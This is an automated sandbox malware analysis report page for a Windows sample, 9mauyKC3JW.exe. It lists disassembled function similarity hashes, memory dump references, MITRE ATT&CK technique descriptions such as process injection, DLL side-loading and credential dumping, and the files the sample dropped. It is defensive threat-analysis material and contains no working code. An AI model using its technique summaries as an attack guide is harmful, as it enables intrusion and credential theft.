Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd

Similarity

API ID: Object$CapsDevice$Select$BitmapCreateDeleteModeStretchType
String ID:
API String ID: 3133578033-0
Opcode ID: 824d1f7ea7e33bd30fc717f7b1acced9e8f78fdd1f61e62a263af8154b59dbb6
Instruction ID: fe887ecd87f489cc207d9cca60f3d9ad6035b125a2efbccc14fa31da29fd090a
Opcode Fuzzy Hash: 824d1f7ea7e33bd30fc717f7b1acced9e8f78fdd1f61e62a263af8154b59dbb6
Instruction Fuzzy Hash: 44316B71A007449FDB249F38C845A6BBFF4FF45700F008A2DE99AC6651EB74EA54DBA0

Function 6BE72460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

#214.IEPDF32(?), ref: 6BE7248D
#214.IEPDF32(?,?,?), ref: 6BE7263A

Strings

Rect, xrefs: 6BE726D7
Link, xrefs: 6BE72548
Subtype, xrefs: 6BE72530

Memory Dump Source

Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true

Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd

Similarity

API ID: #214
String ID: Link$Rect$Subtype
API String ID: 1405426997-3862875103
Opcode ID: d55766aee5798e940f679ff7ced7ee195779afa34f13f8b69fe979dbba3b619a
Instruction ID: 5afb19373da9e1a710fbab0c7471db681875072dce3b627a5600193b6fa22d89
Opcode Fuzzy Hash: d55766aee5798e940f679ff7ced7ee195779afa34f13f8b69fe979dbba3b619a
Instruction Fuzzy Hash: E65196317002198FDF24EF68C891AAE7BF5FF5A718B1000A9D916AB341DB35ED15CBA1

Function 6BE6C670 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

#70.IEPDF32(?), ref: 6BE6C6A5

Strings

Highlight, xrefs: 6BE6CCF0
Subtype, xrefs: 6BE6CCDB

Memory Dump Source

Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true

Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd

Similarity

API ID:
String ID: Highlight$Subtype
API String ID: 0-3181136990
Opcode ID: c73402f8960a731783f644039d7c4b1dc7e69f1a3dcc0063a1f2a17617df4d07
Instruction ID: 5378266eb2f5622721ea01c157c03b131457b52f4ffe96687bb3d024caf2abe1
Opcode Fuzzy Hash: c73402f8960a731783f644039d7c4b1dc7e69f1a3dcc0063a1f2a17617df4d07
Instruction Fuzzy Hash: 43213772F4010D4BEF088E74C841A7B7769EF88658F110A29D9299F750FB35F91287D0

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9mauyKC3JW.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7793cd6f

C:\Users\user\AppData\Local\Temp\8834ed0d

C:\Users\user\AppData\Local\Temp\8f36b088

C:\Users\user\AppData\Local\Temp\ICACHE-1D9F26E2.tmp

C:\Users\user\AppData\Local\Temp\ICACHE-3DB07D2E.tmp

C:\Users\user\AppData\Local\Temp\ICACHE-7851E0C5.tmp

C:\Users\user\AppData\Local\Temp\ICACHE-7E2E8142.tmp

C:\Users\user\AppData\Local\Temp\ILIST-285C4760.tmp

C:\Users\user\AppData\Local\Temp\ILIST-3EBE7AA6.tmp

C:\Users\user\AppData\Local\Temp\ILIST-57AC6DD5.tmp

C:\Users\user\AppData\Local\Temp\ILIST-5B851A26.tmp

C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

C:\Users\user\AppData\Local\Temp\cvnmq

C:\Users\user\AppData\Local\Temp\hv.exe

C:\Users\user\AppData\Local\Temp\iepdf32.dll

C:\Users\user\AppData\Local\Temp\quwq

C:\Users\user\AppData\Local\Temp\tsmbkpqw

C:\Users\user\AppData\Local\Temp\wxhsceg

Windows Analysis Report
9mauyKC3JW.exe